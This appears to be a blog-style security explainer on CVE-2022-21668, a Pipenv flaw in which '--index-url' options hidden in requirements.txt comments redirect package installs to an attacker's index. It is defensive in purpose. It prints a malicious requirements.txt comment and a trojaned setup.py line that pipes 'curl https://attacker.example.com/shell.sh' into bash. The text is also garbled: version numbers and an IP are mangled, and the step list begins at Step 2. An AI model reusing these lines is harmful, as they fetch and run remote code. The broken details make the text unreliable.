CVE-2022-21668 - How Malicious Comments in requirements.txt Could Hijack Your Python Project via Pipenv

In early 2022, a severe security vulnerability (CVE-2022-21668) was discovered in Pipenv—a popular tool for managing Python dependencies. The flaw exists in how Pipenv parses comments in requirements.txt files, and allows attackers to secretly hijack your dependency installations. With the right crafted “comment,” an attacker could instruct your project to download packages from a rogue package repository they control, leading to full remote code execution (RCE) on your machine.

Below, I’ll explain what went wrong, how the exploit works, give simple code examples, and reference the original advisories. I'll also help you understand if you're affected and how to fix it.

What is Pipenv?

Pipenv simplifies Python project dependency management by combining pip and virtualenv into one tool. It’s widely used to lock and install project dependencies safely.

The Vulnerability: Malicious Comments in requirements.txt

Starting with version 2018.10.9 and before 2022.1.8, Pipenv failed to safely parse lines in requirements.txt when comments included command options. Specifically, if an attacker managed to sneak a line such as this into your requirements.txt:

#   --index-url https://malicious.example.com/simple/

Pipenv would not treat that as a harmless comment, and instead would process the hidden flag and use the attacker’s server to fetch Python dependencies.

Why is This Dangerous?

If a project—especially open source—relies on requirements from external files, simply reviewing code visually would not reveal the danger hidden in comments. Once the --index-url flag is processed, all following dependencies could be resolved from the attacker's server, potentially containing packages with code designed to compromise your machine (RCE).

When pip installs source distributions, the install process runs arbitrary Python code from setup.py.

Imagine a line like this is hidden anywhere in your requirements.txt

#   --index-url https://evil.example.com/simple/

Step 2: Pipenv Fails to Ignore the Option

Pipenv’s old parser would incorrectly treat this as a real installation flag, not a comment. All following packages might be fetched from the attacker's malicious package index instead of the official PyPI.

Step 3: Installing a Backdoored Package

An attacker’s index could serve a package (say, requests) that contains hidden malicious Python code. When installed, this code would run automatically on your system due to how Python packaging works.

Malicious requirements.txt Example

# Normal dependency
flask==2..1

# Attacker sets the index URL (HIDDEN in a comment)
#  --index-url https://malicious.example.com/simple/

# Now all subsequent dependencies come from the attacker's server
requests==2.26.

Example of a Malicious setup.py in a Trojaned Package

# setup.py on malicious server
import os
os.system("curl https://attacker.example.com/shell.sh | bash")

If pip downloads and installs this trojan “requests” package, the code in setup.py runs and could compromise your system.

flask==2..1

#    --index-url http://127...1:808/simple/

You use Pipenv version >=2018.10.9 and <2022.1.8

- You install dependencies from requirements.txt files, from third-party sources, or in collaborative projects

Note: This is especially dangerous for projects that accept PRs with requirements changes!

References

- Official pipenv security advisory for CVE-2022-21668
- NIST NVD page for CVE-2022-21668
- Pipenv release notes - 2022.1.8
- Python Packaging Advisory: pip install code execution

Conclusion

CVE-2022-21668 is a perfect example of how subtle bugs in developer tooling can have massive impact. If you use Pipenv, upgrade now and audit your requirements files. Simple “comments” aren’t always as harmless as they look.

Timeline

Published on: 01/10/2022 21:15:00 UTC
Last modified on: 04/25/2022 17:58:00 UTC